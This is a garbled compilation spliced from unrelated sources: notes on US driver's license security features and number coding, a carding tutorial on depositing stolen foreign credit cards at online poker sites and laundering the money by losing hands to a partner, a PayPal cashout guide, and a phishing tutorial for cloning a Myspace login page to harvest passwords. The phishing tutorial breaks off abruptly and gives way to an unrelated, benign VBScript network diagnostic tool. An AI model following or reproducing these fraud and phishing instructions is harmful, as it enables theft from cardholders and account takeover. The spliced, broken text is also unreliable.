+birthday. The Minor's license expires 3 months after the 21st birthday. The license can be extended for 4
+
+years with a renewal sticker, as of January 1997. The operator's minimum age is 16.
+This is a laminated Polaroid photo-ID with the repetitive letters "ILLINOIS" on the laminate. This license
+is full of tricks. As a start, the photo has a number overlapping it. The license number itself is coded. It
+begins with the first letter of the last name, followed by three digits coded on the last name. The next
+three digits are a code based on the first name and middle initial. The next two digits are the year of birth
+and the last three digits signify the person's sex, and the month and day of birth, again in code. The
+number is hyphenated in a misleading way, though: A123-4567-8901.
+Indiana:
+The current license is digitized with a security coating. The prior license is photographic and encased in
+plastic. The prior issues use slash marks in some date fields and the donor field may not be present. The
+current license uses red shading and "COMMERCIAL DRIVER LICENSE-CLASS X" for CDL. The
+prior issue has a yellow headbar and has "COMMERCIAL/ DRIVER'S LICENSE".
+The Minor's license has "Under 21 Until (date)" below the photo in red. Starting January 1999, drivers
+under the age of 18 have "PROBATIONARY" under license type. The older issue has a red photo
+background for drivers under 21.
+The current license has a torch-and-stars pattern on laminate which is visible when tilted. The prior issue
+has the camera number overlapping the photo edge and a gold "INDIANA" pattern repeating on the
+laminate.
+The license number is a 10-digit number spaced as XXXX-XX-XXXX and is not coded.
+The license is valid for 4 years, expiring on the birth date, beginning January 1998. Before that date, the
+license expires on the last day of teh birth month. Drivers who are 75 or older receive 3-year licenses. The
+minimum operator's age is 16 years and 30 days.
+This is a photo ID with a laminate on the front, which gives it a silky texture. There's nothing significant
+about the license number, which may be a Social Security or other number with 9 digits. One trick used in
+this license is listing both the expiration date and the date for re-examination. If they don't match, the
+license is fake. Additionally, there are state seals hidden in the plastic.
+Iowa:
+These licenses are the credit-card style, with bar codes and a magnetic stripe on the back. The prior
+license is enclosed in plastic. The CDL has a green header and a picture border, along with "IOWA
+COMMERCIAL/DRIVER LICENSE". The prior license has "CDL" down the right side of the license.
+The Minor's license has drivers under 18 receiving a first-level operator license with a fuchsia header and
+a picture border, titled "IOWA INTERMEDIATE/DRIVER LICENSE". "Under 18/ 21 Until MM-DD-
+YY" apprears under the photo. Older formats have "UNDER 21" or "MINOR" down the right side.
+Current licenses have name and address in red below photo, and the last two digits of the date of birth are
+in red under the expiration date.
+The director's signature and station number overlap the photo. There is also a multicolored state seal and a
+DOT logo repeating in the security laminate.
+The license number is the Social Security number, or a combination of 3 numbers, 2 letters, and 4
+numbers.
+The license is valid for 2 or 4 years, expiring on the birthday, with a 60-day grace period. 2 or 4-year
+extensions take effect when they are accompanied by a renewal certificate. Also, two 6-month extensions
+are available. The first-level operator's license is good for up to one year. The operator's minumum age is
+16, but the restricted license is available to those who are atleast 14.
+
+This is a photo-ID laminated in plastic. The tricks employed in this license are that the Director's
+signature and the station number overlap the photo. The license number may be the SS number or nine
+digits and letters. Minors under 19 have their photos in profile. An additional trick is the lettering "IOWA
+DEPARTMENT OF TRANSPORTATION" in the plastic.
+Kansas:
+This license is encased in plastic with or without rounded corners. A holographic rectangle is on the front,
+and and there is a magnetic stripe on the back. The Administrators' names may vary. For the CDL, "CDL"
+is on the headbar.
+The Minor's license says "NOT 21 UNTIL XX-XX-XXXX" in white letters on a red band below the
+photo or "NOT 18 UNTIL XX-XX-XXXX" in black letters on a green band beginning July 1997. Drivers
+14 to 16 have J02 or J09 in the restriction field or "Age Restricted to 16" or "Farm Permit".
+The license uses a holographic rectangle which shows "KANSAS" in blue to the right of the photo.
+The license number is the Social Security number or an assigned number of K and 8 digits.
+The license is valid for 6 years for drivers between the ages of 21 and 64, which expires on their birthday,
+with a 2-year early renewal option, beginning January 1998. Before that date, licenses are valid for 4
+years. Beginning July 1995, out-of-state licenses can be extended up to 6 months. The operator's
+minimum age is 14, which is restricted until 16.
+This license is a laminated photo-ID with the state seal in front in the data area. Two signatures overlap
+the photo. There are a couple of tricks: Those under 21 have red backgrounds in the photos. The letters
+"KANSAS" are repeated on the laminate.
+Kentucky:
+This license is photographic and encased in plastic. The older issue features a repetitive pattern of
+"KENTUCKY" across the data area, and the current issue has a running horse as part of the state name.
+The prior issue has "CDL LIC" or "CDL LICENSE" printed above the photo. The current issue license
+shows "CDL" in the license type area.
+The Minor's license has "UNDER 21" in blue on the sides of the laminate, and "UNDER 21" above the
+photo. The prior issue has blue bars at the top and bottom in the laminate, and the same words on the
+back.
+The current issue has a large ghost seal and a stylized laminate, plus a vertical signature at the left side of
+the photo. The prior issue has a state seal above the data area, and the signature and camera number
+overlapping the photo edges.
+The license number is a 9-character number beginning with a letter (usually the first initial of the last
+name), then the 2-digit year the license was issued, and then a sequence of 6 numbers. Before November
+1996, this number was not hyphenated. Before November of 1995, the Social Security number or an
+assigned 9 or 10-digit number was used.
+The license is valid for 4 years for drivers age 21 and over, expiring on the last day of the birth month.
+For those under 21, it is valid for up to 5 years, but it expires 30 days after the driver's 21st birthday.
+
+Online Casinos Explained
+This article is written exclusively for the beginners and cannot be considered as a ideal description of
+earning money from online casinos
+1. Selecting a Casino (finding a poker site)
+I would advise beginners to start by searching poker websites. You will become an expert by typing in the
+following phrases such as Poker, Casino, Slot or Texas hold ‘em on search engines such as Google,
+Yahoo.
+When you finally complete your search, compile a list of online casinos and start by examining them all.
+You will need to first register accounts on the online casinos that you have chosen from your search.
+Enter any registration data and then proceed to the category, Deposit/Withdrawal. Here we can see which
+types of money can be deposited and withdrawn on this specific casino site. It is important to focus on the
+credit card deposit, fortunately almost every online casino this type of depositing money. The reason for
+online casinos accepting credit cards as a method of depositing money is simple; it is convenient, easy
+and is well saturated because of the high usage of credit/debit cards. Take a look at the method of
+withdrawing money. The most popular methods will be Money Bookers, Click2pay, Neteller, Credit Card
+and a few other payment accounts and systems. Webmoney is the least used system of money withdrawal,
+try to guess why )
+So, when you have chosen an online casino we will continue our guide with all the mentioned above
+parameters. Now we are interested in the limits on the first deposit. The bigger the limit is, the better for
+us. Still, I would not advise you on starting to work with online casinos such as Go Play of the B2B net,
+because here the limit of the first deposit will it reach the maximum at 20 dollars. Usually almost all
+casinos have high limit, which exceed that sum that we will deposit. I would like to note that anti-fraud
+policies of the online casino affects all the rooms on this site – which means that if one of the room blocks
+you from depositing or withdrawing money or asks you for scans or calls you, it is better to leave this
+online casino, as it will make life difficult.
+2. Depositing (Depositing using cvv)
+Remember that you will probably not be able to use American cards on your online casino that you have
+selected, because Americans are prohibited from gambling online. However an alternative solution is to
+buy EU cc or one from the UK, although cards from Italy, France or Germany are the best to use. When
+you have got you valid cc – we can definitely get started.
+We should follow the standard registration procedure. Enter in all the cardholder’s information. After you
+have entered in one valid e-mail addresses, you will receive a email link to verify this online casino
+account, once you have clicked the link in the email, you have completed the e-mail verification and will
+have completed registration. If you have not logged in to the account now is the time to login. We are
+interested in the balance growth. Click on the methods of deposit and in our case, the method is credit
+card. Copy all the data and enter it into the correct text fields. Usually the page will ask you to enter the
+CC number, First and Last name, Card expiry date and CVV code, which is the last 3 digits on the back
+of a credit card (if its Visa or MasterCard. It will ask you to enter the amount you wish to deposit. (I
+Strongly recommend you on setting the amount within the range of 200-700 dollars, depending on the
+online casino and card type). One important thing – Remember to set the card’s type, If it is a Visa then
+the CC number will begin with a 4 or 6, if it is a MasterCard it will start with a 5.
+Click on the Submit button and wait until the data processing is complete. If the deposit was not
+successful, you should not get upset – everything comes with experience. There could be several reasons
+as to why this has happened: either the bank did not authorize this transaction, the card has exceeded the
+limit for that day or that the card does not have enough funds. Alternatively the site may not allow the cc
+processing of a particular bank. After a short period of time you will make your own BIN-base of the
+cards that you can deposit successfully. So let’s move on to the next point.
+3. Losing to the other person
+Here we have reached the important point, in my opinion. There are two parts of a deposit.
+a. Lose
+The idea is to lose the money in this account to your partners. your partner should have a clear account on
+this online casino. On this account a deposit should be made, and on this account all the money won will
+
+be added. You choose one room in the poker site and start the game. It will most probably be the Texas
+hold ‘em poker game.
+I will describe the game rules in another topic. I have experience playing poker this is why I am planning
+to write up articles on the game nuances.
+During the game you should realistically lose your staked money. You know your opponents cards and on
+your mutual decision you make a stake or pass – as a result of it on the river you should have a winning
+combination, you hand should be really strong respectfully to the strength of the combination of your
+partner. The possibility of bluff is not excluded too. For example if you hand is a little weaker in this case
+you have a pair of JJ and you opponent has a pair of QQ 0 in this case if you make bet/raise (stake the
+sum or raise it) on the sum of ? of your bank or higher till the stake ‘all in’ a stake for all the dibs) you
+will get a pot (bank). Naturally all the game goes according to the wishes and desires of your partner,
+there should be harmony in your actions in order to escape unneeded situations.
+I will not get into the details of the game’s nuances when there are other people playing in the same room,
+I will just describe shortly one of the main and important tactics. You and your opponent take seats close
+to each other. Somebody among you both (it will be better if its yourself – because It is easier to lose
+somebody’s money) regularly and aggressively lays and stakes his money on the preflop – the first step of
+the game, it is there when the cards should be divided among the players in a clockwise fashion, starting
+from the player called BigBlaind). Doing this he sorts or even makes people discard their cards. The bid
+sum should not be very small or very big. I think that it will be convenient to make a first bid of the sum
+of 10BB. Still everything depends on the style of playing of the other player, on their general amount and
+on the cards you have.
+That’s all; I have already described a first method…then we will take a closer look to each of them.
+B) Go on playing
+This method requires professionalism and special knowledge of the game itself, and it will not be
+convenient for the beginners.
+The sense is to win the game-actually; this aim has every player of the room. When you have already won
+some certain sum of money you make a withdrawal on the card you have previously made a deposit on,
+you set the same amount of money you had at the beginning of your game. One problem can arise – every
+Casino asks you to make the first withdrawal to the same place (card or some system) where you had your
+first deposit. Moreover the sum of money withdrawed should be equal to those of the deposit. The rest of
+the money, won by you, can be transferred to other systems by every possible means.
+Here probably you will have a question, why should not I play honestly and win the money, if I can
+simply use my own budget and then be free to choose the way of its withdrawal escaping other
+impediments? It is not so pitifully – to lose somebody’s money and not your own. Having lost all the
+deposit you will lose your maximum – your time and material, which costs lower and much lower than
+the previous option Benefit is obvious here.
+
+Paypal Cvv
+carding
+Two accs from this site http://poker.betfair.com one with the emal adress of the pp you want to cash out
+and one with your real data. make sure that u have verified the real acc to withdraw your money from this
+site(i lost 250 on research for this tut ) before u transfer big sums two acc where suspended from me.
+after you know everything works u only need 2 ip addy one for the real name acc and one for the acc u
+want to cash out i suggest to use rdp for the other one.
+now u can meet on an empty and start transfer the money (750 max). make a small show than it wont be
+suspect 4 the admin.
+
+Phishing
+Tutorial
+Hello carders, maybe someone will find this usefull! enjoy
+1. Intro
+There are couple of other phishing tutorials around here, but some people seem to have problems
+understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and
+if you have problems understanding it, then you need to get some beginner level computer knowledge
+first.
+-This article was written for educational purpose only. I'm not responsible for any illegal activity that you
+may commit.
+2. What is a phisher?
+Phisher is something that looks like a login page(a fake login page), that writes the username and the
+password to a file, or does whatever you want.
+3. How to make one?
+All you need is a web hosting service with PHP enabled.
+We will use t35. Go to www. t35. com (remove spaces) and sign up for a free account. (whenever I write
+something like www. t35. com, you should remove the spaces inbetween. I'm doing it cause the link for
+t35 is censored on hackforums.) In this tutorial we will make a phishing site for Myspace(the procedure is
+equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his
+picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to
+do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your
+Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the
+source code), and copy it.
+Get back to your t35 account and click on 'New File', delete the text that will be there by default, and
+paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
+Now you have made a page equal to Myspace. Everything on that page will have the same function as if it
+were on the original site. The link to your phish site will be 'www.xxx. t35. com/index.php' - where 'xxx'
+is the name of your account(you can name it anyhow.
+But there is a little problem. When someone enters his username and password and press login, it logs
+him into the real myspace.
+What do we need to change?
+What we need to change is the action of the 'login' button, so instead of logging them into the real site, it
+writes the username and password to a text file.
+Open your 'index.php' file. Search in the code for keywords 'action='.
+There will be several 'action=some link' in the myspace's source code(for the sign in button, search
+button, etc.). We need to find the 'action=some link' that refers to the Login button.
+After some searching, we find the:
+Code:
+
+Member Login
+
+
" & "Account running this script is " _
+& WshNet.UserDomain & "\" & WshNet.UserName & " @ " _
+& Now & " from workstation " & WshNet.ComputerName & "
"
+OutPutFile.WriteLine "Information on remote machine \\" _
+& UCase(CompName) & "
"
+OutPutFile.WriteLine "To see information as it " _
+
+loads hit the REFRESH button on your web browser.
"
+OutPutFile.WriteLine " "
+WshShell.Run PathToScript & "\" & CompName & ".html"
+End Function
+Function GetOS(CompName)
+OutPutFile.WriteLine "1 - Operating System "
+OutPutFile.WriteLine "Operating System Version = " _
+& ADSIobj.OperatingSystem & " " & ADSIobj.OperatingSystemVersion & " "
+For Each Instance in wmi.ExecQuery("Select * From Win32_OperatingSystem")
+OutPutFile.WriteLine "Operating System Caption = " _
+& Instance.Caption & " "
+OutPutFile.WriteLine "Operating System Service Pack = " _
+& Instance.CSDVersion & " "
+OutPutFile.WriteLine "Operating System LastBootUpTime = " _
+& StrDateTime(Instance.LastBootUpTime) & " "
+OutPutFile.WriteLine "Operating System Directory = " _
+
+& Instance.WindowsDirectory & " "
+Next
+OutPutFile.WriteLine " "
+End Function
+Function GetAdmins(CompName)
+Dim Admins,Admin
+Dim AdsInfo
+Set Admins = GetObject("WinNT://" & CompName & "/Administrators")
+OutPutFile.WriteLine "2 - Members of the local " _
+& "administrators group "
+OutPutFile.WriteLine "Name
+b> Type
+Description "
+For Each Admin in Admins.Members
+Set AdsInfo = GetObject(Admin.adspath)
+OutPutFile.WriteLine "" & AdsInfo.Name & " " _
+& AdsInfo.Class & " " & AdsInfo.Description & " "
+
+Next
+OutPutFile.WriteLine "
"
+OutPutFile.WriteLine " "
+End Function
+Function Services(CompName,SelectServices)
+Dim Service,srvc,State,Strg
+OutPutFile.WriteLine "3 - Status of vital services "
+OutPutFile.WriteLine "Service
+Name Display Name
+Status "
+For Each Service in SelectServices
+Strg = "" & Service & "
+td> NOT PRESENT
+td> "
+ADSIobj.Filter = Array("Service")
+For Each srvc in ADSIobj
+
+Select Case srvc.Status
+Case 1 State = "STOPPED "
+Case 2 State = "START_PENDING "
+Case 3 State = "STOP_PENDING "
+Case 4 State = "RUNNING"
+Case 5 State = "CONTINUE_PENDING "
+Case 6 State = "PAUSE_PENDING "
+Case 7 State = "PAUSED "
+Case Else State = "ERROR "
+End Select
+If LCase(srvc.Name) = LCase(Service) Then Strg = _
+"" & srvc.Name & " " &
+srvc.DisplayName _
+& " " & State & " "
+Next
+OutPutFile.WriteLine Strg
+Next
+OutPutFile.WriteLine "
"
+
+OutPutFile.WriteLine " "
+End Function
+Function AdminShares(CompName)
+Dim Shares
+OutPutFile.WriteLine "4 - Status of administrative shares "
+Shares = True
+If WshFso.FolderExists("\\" & CompName & "\c$") = True Then
+OutPutFile.WriteLine "C$ share exists "
+Else
+Shares = False
+OutPutFile.WriteLine "C$ share is not " _
+& "accessible "
+End If
+If WshFso.FolderExists("\\" & CompName & "\admin$") = True Then
+OutPutFile.WriteLine "admin$ share exists "
+Else
+
+Shares = False
+OutPutFile.WriteLine "admin$ share is not " _
+& "accessible "
+End If
+If Shares = False Then
+OutPutFile.WriteLine " "
+OutPutFile.WriteLine "Shares made not be " _
+& "accessible due to the folowing reasons: "
+OutPutFile.WriteLine "a - You do not have " _
+& "admin rights on this box "
+OutPutFile.WriteLine "b - box is offline "
+OutPutFile.WriteLine "c - Server service is not " _
+& "running "
+OutPutFile.WriteLine "d - Shares have been " _
+& "disabled "
+OutPutFile.WriteLine "e - remote machine's " _
+& "operating system is not NT-based "
+End If
+
+OutPutFile.WriteLine " "
+End Function
+Function GetTime(CompName)
+OutPutFile.WriteLine "5 - Current date and time "
+OutPutFile.WriteLine "Current date and time of a domain controller "
+WshShell.Run ComSpec & " /c net time /DOMAIN:" & Domain & " >" _
+& PathToScript & "\time.txt",6,True
+Set DumpFile = WshFso.OpenTextFile(PathToScript & "\time.txt", 1, True)
+Do While DumpFile.AtEndOfStream <> True
+CurLine = DumpFile.ReadLine
+If InStr(CurLine,"Current") <> 0 Then
+OutPutFile.WriteLine CurLine & " "
+End If
+Loop
+DumpFile.Close
+OutPutFile.WriteLine "Current date and time of computer you are " _
+
+& "troubleshooting "
+WshShell.Run ComSpec & " /c net time \\" & CompName " _
+& " >" & PathToScript & "\time.txt",6,True
+Set DumpFile = WshFso.OpenTextFile(PathToScript & "\time.txt", 1, True)
+Do While DumpFile.AtEndOfStream <> True
+CurLine = DumpFile.ReadLine
+If InStr(CurLine,"Current") <> 0 Then
+OutPutFile.WriteLine CurLine & " "
+End If
+Loop
+DumpFile.Close
+OutPutFile.WriteLine " "
+End Function
+Function Ping(CompName)
+OutPutFile.WriteLine "7 - Ping test (DNS name resolution) "
+OutPutFile.WriteLine "If you get no reply on the ping yet other data is
+retrieved on this page then there is most likely a problem with a static DNS entry.
+
+This needs to be fixed before anything else. You MUST VERIFY the machine is running
+DHCP before
+you modify the static DNS entry!!!! "
+WshShell.Run ComSpec & " /c ping " & CompName & " >" &
+PathToScript & _
+"\ping.txt",6,True
+Set DumpFile = WshFso.OpenTextFile(PathToScript & "\ping.txt", 1, True)
+Do While DumpFile.AtEndOfStream <> True
+OutPutFile.WriteLine DumpFile.ReadLine & " "
+Loop
+Set DumpFile = Nothing
+OutPutFile.WriteLine " "
+End Function
+Function GetNBTstat(CompName)
+Dim User
+User = "Nobody Logged On"
+
+WshShell.Run ComSpec & " /c nbtstat -a " & CompName & " >" &
+PathToScript & "\nbt.txt",6,True
+Set DumpFile = WshFso.OpenTextFile(PathToScript & "\nbt.txt", 1, True)
+Do While DumpFile.AtEndOfStream <> True
+CurLine = DumpFile.ReadLine
+If InStr(CurLine,"---") <> 0 Then
+CurLine = DumpFile.ReadLine
+CompName = Trim(Left(CurLine,InStr(CurLine,"<")-1))
+End If
+If InStr(CurLine,"<03>") <> 0 Then
+If Trim(Left(CurLine,InStr(CurLine,"<03>")-1)) <> _
+UCase(CompName) and _
+Trim(Left(CurLine,InStr(CurLine,"<03>")-1)) <> _
+UCase(CompName) & "$" Then
+User = Trim(Left(CurLine,InStr(CurLine,"<03>")-1))
+End If
+End If
+If InStr(CurLine,"<1E>") <> 0 Then
+
+If Trim(Left(CurLine,InStr(CurLine,"<1E>")-1)) <> UCase(CompName)
+and Trim(Left(CurLine,InStr(CurLine,"<1E>")-1)) <> UCase(CompName) & "$"
+Then
+Domain = Trim(Left(CurLine,InStr(CurLine,"<1E>")-1))
+End If
+End If
+Loop
+OutPutFile.WriteLine "6 - NetBIOS Info "
+OutPutFile.WriteLine "Current User Logged on = " & User & " (this value may
+not be accurate, it depends on the box's messenger service) "
+OutPutFile.WriteLine "Domain machine is joined to = " & Domain & " "
+DumpFile.Close
+OutPutFile.WriteLine " "
+End Function
+Function GetNIC(CompName)
+OutPutFile.WriteLine "9 - Network Card Configuration "
+
+For Each Instance in wmi.ExecQuery("Select * From Win32_" & _
+"NetworkAdapterConfiguration Where IPenabled = 'True'")
+OutPutFile.WriteLine "" & _
+"Attribute Value "
+OutPutFile.WriteLine "Name of card " _
+& Instance.Caption & " "
+OutPutFile.WriteLine "DHCP Enabled " _
+& Instance.DhcpEnabled & " "
+OutPutFile.WriteLine "IP address " _
+& Instance.IPAddress(0) & " "
+OutPutFile.WriteLine "Subnet Mask " _
+& Instance.IPSubnet(0) & " "
+OutPutFile.WriteLine "MAC Address " _
+& Instance.MACAddress & " "
+OutPutFile.WriteLine "DNS HostName " _
+& Instance.DNSHostname & " "
+OutPutFile.WriteLine "DNS Servers(in order) " _
+& Instance.DNSServerSearchOrder(0) & " : " _
+
+& Instance.DNSServerSearchOrder(1) & " "
+OutPutFile.WriteLine "Primary WINS " _
+& Instance.WINSPrimaryServer & " "
+OutPutFile.WriteLine "Secondary WINS " _
+& Instance.WINSSecondaryServer & " "
+OutPutFile.WriteLine "
"
+Next
+OutPutFile.WriteLine " "
+End Function
+Function GetRegQuota(CompName)
+OutPutFile.WriteLine "8 - Registry size information "
+For each Instance in wmi.InstancesOf("Win32_Registry")
+OutPutFile.WriteLine "Current Registry size is " _
+& Instance.CurrentSize & " MB's. "
+OutPutFile.WriteLine "Maximum Registry size is " _
+& Instance.MaximumSize & " MB's. "
+
+If Instance.MaximumSize - Instance.CurrentSize < 8 Then
+OutPutFile.WriteLine "The Registry quota on " _
+& CompName & " may need to be increased!!! "
+End If
+Next
+OutPutFile.WriteLine " "
+End Function
+Function GetHW(CompName)
+Dim stuff
+OutPutFile.WriteLine "10 - Hardware Information "
+For Each Instance in wmi.ExecQuery("Select * From Win32_" & _
+"LogicalDisk Where DeviceID = 'C:'")
+OutPutFile.WriteLine "Total Drive space available on C: is " & Left(Instance.
+FreeSpace/1000000,InStr(Instance.FreeSpace/1000000, ".")-1) & " Megabytes. "
+stuff = ((Instance.Size - Instance.FreeSpace)/Instance.Size)*100
+OutPutFile.WriteLine "The C: drive is " _
+& Left(stuff,InStr(stuff, ".")-1) & "% full. "
+
+Next
+For Each Instance in wmi.ExecQuery("Select * From Win32_ComputerSystem")
+OutPutFile.WriteLine "Computer Manufacturer = " _
+& Instance.Manufacturer & " "
+OutPutFile.WriteLine "Computer Model = " & Instance.Model & " "
+OutPutFile.WriteLine "Total Physical Memory = " & Left
+(Instance.TotalPhysicalMemory/1000000,InStr(Instance.TotalPhysicalMemory/1000000,".")-1)
+& " MB's" & " "
+Next
+For Each Instance in wmi.ExecQuery("Select * From Win32_" & _
+"SystemEnclosure")
+OutPutFile.WriteLine "Asset Tag = " & Instance.SMBIOSassettag " _
+& " "
+OutPutFile.WriteLine "Serial Number = " & Instance.serialnumber " _
+& " "
+Next
+For Each Instance in wmi.ExecQuery("Select * From Win32_Processor")
+
+OutPutFile.WriteLine "Processor Name = " & Instance.Name & " "
+OutPutFile.WriteLine "Processor Clock Speed = " _
+& Instance.CurrentClockSpeed & " MHz "
+OutPutFile.WriteLine "Processor Voltage = " _
+& Instance.CurrentVoltage & " Volts "
+OutPutFile.WriteLine "Current Processor Load = " _
+& Instance.LoadPercentage & "% "
+Next
+OutPutFile.WriteLine " "
+End Function
+Function GetSW(CompName)
+Dim oReg
+Dim NavParent,PatternDate,NavDir,NavVer,IEVersion,program,installed,
+Version,ProgramName
+OutPutFile.WriteLine "11 - Software Information "
+Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" _
+& CompName & "/root/default:StdRegProv")
+
+oReg.getstringvalue 2147483650,"SOFTWARE\INTEL\LANDesk\VirusProtect6\CurrentVersion\",
+"Parent",NavParent
+oReg.getstringvalue 2147483650,"SOFTWARE\Symantec\SharedDefs\", _
+& "NAVCORP_70",PatternDate
+oReg.getstringvalue 2147483650,"SOFTWARE\Symantec\InstalledApps\" & _
+","NAV",NavDir
+If UCase(Left(NavDir,1)) = "C" Then
+NavVer = WshFso.GetFileVersion("\\" & CompName & "\c$\" _
+& Right(NavDir,Len(NavDir)-3) & "\vpc32.exe")
+OutPutFile.WriteLine "Norton Antivirus Version = " & NavVer _
+& " "
+End If
+PatternDate = Right(PatternDate,12)
+OutPutFile.WriteLine "Norton Antivirus Parent Server = " & NavParent _
+& " "
+OutPutFile.WriteLine "Norton Antivirus Definition Date = " _
+& Mid(PatternDate,5,2) & "/" & Mid(PatternDate,7,2) & "/" &
+
+Mid(PatternDate,1,4) & " Revision " & Right(PatternDate,3) & " "
+oReg.getstringvalue 2147483650,"SOFTWARE\Microsoft\Internet Explorer\" & _
+","Version",IEVersion
+OutPutFile.WriteLine "Internet Explorer Version = " & IEVersion
+OutPutFile.WriteLine "
Installed Programs(from Add/Remove Programs applet)
+p>"
+OutPutFile.WriteLine "
Program
+Name Version(if available)
+tr>"
+oReg.EnumKey 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\" & _
+"Uninstall", installed
+For each program in installed
+oReg.getstringvalue 2147483650,"SOFTWARE\Microsoft\Windows\" & _
+"CurrentVersion\Uninstall\" & program & "\","DisplayName",ProgramName
+oReg.getstringvalue 2147483650,"SOFTWARE\Microsoft\Windows\" & _
+"CurrentVersion\Uninstall\" & program & "\","DisplayVersion",Version
+If ProgramName <> "" Then
+OutPutFile.WriteLine "" & ProgramName & "
+
+td> " & Version & " "
+End If
+Next
+OutPutFile.WriteLine "
"
+OutPutFile.WriteLine " "
+End Function
+Function GetEvents(CompName)
+OutPutFile.WriteLine "12 - First 25 Errors from the system event log "
+OutPutFile.WriteLine "DateTimeStamp
+ EventSource
+Message "
+For Each Instance in wmi.ExecQuery("Select * From Win32_NTLogEvent Where Type =
+'Error' and LogFile = 'System'")
+Cnt = Cnt + 1
+If Cnt = 25 Then Exit For
+OutPutFile.WriteLine "" & Mid(Instance.TimeGenerated,5,2) " _
+
+& "-" & Mid(Instance.TimeGenerated,7,2) & "-" _
+& Left(Instance.TimeGenerated,4) & " " _
+& Instance.SourceName & " " & Instance.Message & " "
+Next
+OutPutFile.WriteLine "
"
+End Function
+Function StrDateTime(d)
+Dim strVal,strDate,strTime
+strVal = CStr(d)
+strDate = DateSerial(Left(strVal, 4), _
+Mid(strVal, 5, 2), _
+Mid(strVal, 7, 2))
+strTime = TimeSerial(Mid(strVal, 9, 2), _
+Mid(strVal, 11, 2), _
+Mid(strVal, 13, 2))
+StrDateTime = strDate + strTime
+End Function
+
+Function ExitScript
+OutPutFile.WriteLine ""
+OutPutFile.Close
+WshShell.Run PathToScript & "\" & CompName & ".html"
+If Progress Then
+MsgBox "The " & Title & " script is done.",vbokonly + _
+vbsystemmodal,Title
+End If
+Set WshShell = Nothing
+Set WshFso = Nothing
+Set WshNet = Nothing
+Set OutPutFile = Nothing
+Wscript.Quit(0)
+End Function
+Running the Hack
+To run this hack, simply double-click on the DesktopChecker.vbs
+file in Windows Explorer (or on a shortcut to the file on your
+
+desktop). Then, type the name of the remote computer you want
+to query using either its NetBIOS name, DNS name, or IP
+address. At this point, Internet Explorer will open and display a
+page titled "myITforum Helpdesk Diagnostic Tool," followed by a
+series of dialog boxes that show the progress of the script (you
+don't need to click OK to close these dialog boxes, because
+they close automatically). Once the final dialog box
+appears"The myITforum Helpdesk Diagnostic Tool script is
+done"click OK and refresh the web page to view the information.
+Here's some sample output generated when the script was run
+on a workstation using Domain Admin credentials. The target
+machine is a Windows Server 2003 machine named SRV230. The
+output of the script is in the form of an HTML page named
+srv230.htm, which is created in the same directory where the
+script itself resides, but the output has been reformatted here as
+text to make it easier to include in this book.
+myITforum - Helpdesk Diagnostic Tool
+Account running this script is MTIT2\administrator @ 12/3/2003 11:40:37 AM from
+workstation
+SRV235
+Information on remote machine \\SRV230
+To see information as it loads hit the REFRESH button on your web browser.
+----------------------------------------------------------------------------
+1 - Operating System
+Operating System Version = Windows NT 5.2
+
+Operating System Caption = Microsoft(R) Windows(R) Server 2003, Enterprise Edition
+Operating System Service Pack =
+Operating System LastBootUpTime = 12/3/2003 11:26:42 AM
+Operating System Directory = C:\WINDOWS
+----------------------------------------------------------------------------
+2 - Members of the local administrators group
+Name Type Description
+Administrator User Built-in account for administering the computer/domain
+Enterprise Admins Group Designated administrators of the enterprise
+Domain Admins Group Designated administrators of the domain
+----------------------------------------------------------------------------
+3 - Status of vital services
+Service Name Display Name Status
+winmgmt Windows Management Instrumentation RUNNING
+Norton Antivirus Server NOT PRESENT
+DefWatch NOT PRESENT
+clisvc NOT PRESENT
+Dhcp DHCP Client RUNNING
+
+----------------------------------------------------------------------------
+4 - Status of administrative shares
+C$ share exists
+admin$ share exists
+----------------------------------------------------------------------------
+5 - Current date and time
+Current date and time of a domain controller
+Current date and time of computer you are troubleshooting
+----------------------------------------------------------------------------
+6 - NetBIOS Info
+Current User Logged on = Nobody Logged On (this value may not be accurate, it depends on
+the box's messenger service)
+Domain machine is joined to = amd
+----------------------------------------------------------------------------
+7 - Ping test (DNS name resolution)
+If you get no reply on the ping yet other data is retrieved on this page then there is
+most likely a problem with a static DNS entry. This needs to be fixed before anything
+
+else.
+You MUST VERIFY the machine is running DHCP before you modify the static DNS entry!!!!
+----------------------------------------------------------------------------
+8 - Registry size information
+Current Registry size is 1 MB's.
+Maximum Registry size is 88 MB's.
+----------------------------------------------------------------------------
+10 - Hardware Information
+Total Drive space available on C: is 1776 Megabytes.
+The C: drive is 58% full.
+Computer Manufacturer = System Manufacturer
+Computer Model = System Name
+Total Physical Memory = 536 MB's
+Asset Tag = Asset-1234567890
+Serial Number = Chassis Serial Number
+Processor Name = Intel(R) Pentium(R) III processor
+Processor Clock Speed = 501 MHz
+Processor Voltage = 29 Volts
+
+Current Processor Load = 2%
+----------------------------------------------------------------------------
+9 - Network Card Configuration
+Attribute Value
+Name of card [00000001] 3Com EtherLink XL 10/100 PCI For Complete PC Management
+NIC (3C905C-TX)
+DHCP Enabled False
+IP address 172.16.11.230
+Subnet Mask 255.255.255.0
+MAC Address 00:01:02:FC:92:FC
+DNS HostName srv230
+DNS Servers(in order) 172.16.11.230 :
+Primary WINS
+Secondary WINS
+----------------------------------------------------------------------------
+11 - Software Information
+Norton Antivirus Parent Server =
+
+Norton Antivirus Definition Date = // Revision
+Internet Explorer Version = 6.0.3790.0
+Installed Programs(from Add/Remove Programs applet)
+Program Name Version(if available)
+FullShot V6
+Windows Media Player Hotfix [See wm819639 for more information]
+Remote Administration Tools 5.2.3790.0
+----------------------------------------------------------------------------
+12 - First 25 Errors from the system event log
+DateTimeStamp EventSource Message
+11-21-2003 W32Time The time provider NtpClient is configured to acquire time
+from one or more time sources, however none of the sources are currently accessible. No
+attempt to contact a source will be made for 15 minutes. NtpClient has no source of
+accurate time.
+11-13-2003 DCOM The server {A9E69610-B80D-11D0-B9B9-00A0C922E750} did not
+register with DCOM within the required timeout.
+etc...
+
+Dennis Abbott
+
+Hack 15 Top Five Tools
+Here's one IT professional's take on five third-party tools for
+Windows 2000 every system administrator should have.
+There can be no doubt that with every release of Microsoft's
+operating system the need for third-party utilities becomes less
